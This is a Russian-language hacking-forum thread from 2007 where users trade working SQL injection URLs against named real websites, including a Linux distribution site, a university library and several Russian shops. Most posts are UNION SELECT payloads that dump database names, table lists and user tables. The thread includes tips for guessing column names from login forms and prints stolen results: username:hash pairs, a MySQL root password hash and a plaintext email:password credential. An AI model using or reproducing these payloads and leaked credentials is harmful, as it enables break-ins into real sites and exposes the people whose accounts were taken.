Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.04.2007, 18:08
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Ой, чувствую не поймут меня =)
http://www.dafna.ru/catalog/good/?module=52&id=11110+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,version(),38
|
|
|
02.04.2007, 18:12
|
|
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641
Репутация:
590
|
|
Код:
http://photo.dive.kz/photo.php?id=-784+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6/*
|
|
|
|
02.04.2007, 18:42
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Какой то векторлинукс, в первый раз слышу. http://vectorlinux.com/ Ну да пох=\
Скуль:
http://vectorlinux.com/article.php?sid=40'
Колумны:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8
Версия 4.1.20:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,VERSION(),5,6,7,8
Т.к. мускул ниже 5 ветки, то тупо перебераем таблицы.
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8+from+users
Что бы небыло ебли с именами колонок, смотрим форму авторизации:
Код HTML:
Nickname: <input type="text" name="uname" size="12" maxlength="25" /><br />
Password: <input type="password" name="pass" size="12" maxlength="20" /><br />
Ибо:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users
Tigger:dd0ced770c9b3a5209a1c48dba1c6d86
Всё=\ |
|
|
|
02.04.2007, 18:47
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(client,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+request+limit+0,1/*
Код:
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+38,1/*
Код:
http://kvadroplast.perm.ru/catalog.html?cat=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
Кстати я тоже имена колонок смотрю в исходниках формы - почти всегда прокатывает, и ни какие информатион_счема не нужны, хотя с ними тоже не плохо)) |
|
|
|
02.04.2007, 18:48
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Add:
Хотя если поиграть с лимитами, выдаёт другого юзера:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users+limit+1,1
|
|
|
|
02.04.2007, 18:58
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Колонка CHARACTER_SET_NAME
Таблица CHARACTER_SETS
Так что только:
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
|
|
|
|
02.04.2007, 19:03
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Spyder
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
И это чем то помогло? =\
|
|
|
|
02.04.2007, 19:20
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
омфг, Слип. Иди статью Зако почитай =\
|
|
|
|
02.04.2007, 19:27
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Поздравьте меня! Мой первый скуль :
http://www.russianst.com/mobile/phone.php?p=1'
Поле там вроди одно
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1
 |
|
|
|
02.04.2007, 19:27
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от [sL1p]
И это чем то помогло? =\
меня глючит или пароль не выведен? колонка 'passw'
Код:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d
ну и от меня еще:
restko.ru
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password)+using+cp1251)+from+mysql.user/*
root_s194u:*FB96B86F2CB3B44E1F1854B65E4333A1649F18 6B
к мускул..
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(email,0x3a,pass)+using+cp1251)+from+user/*
пароли в чистом виде.. пример - restko@restko.ru:rel021
//upd:
Сообщение от NOmeR1
Поздравьте меня! Мой первый скуль :
Поле там вроди одно
а вроде нет.. двадцать два 
Код:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
дальше сам думай)
Последний раз редактировалось n1†R0x; 02.04.2007 в 19:34..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
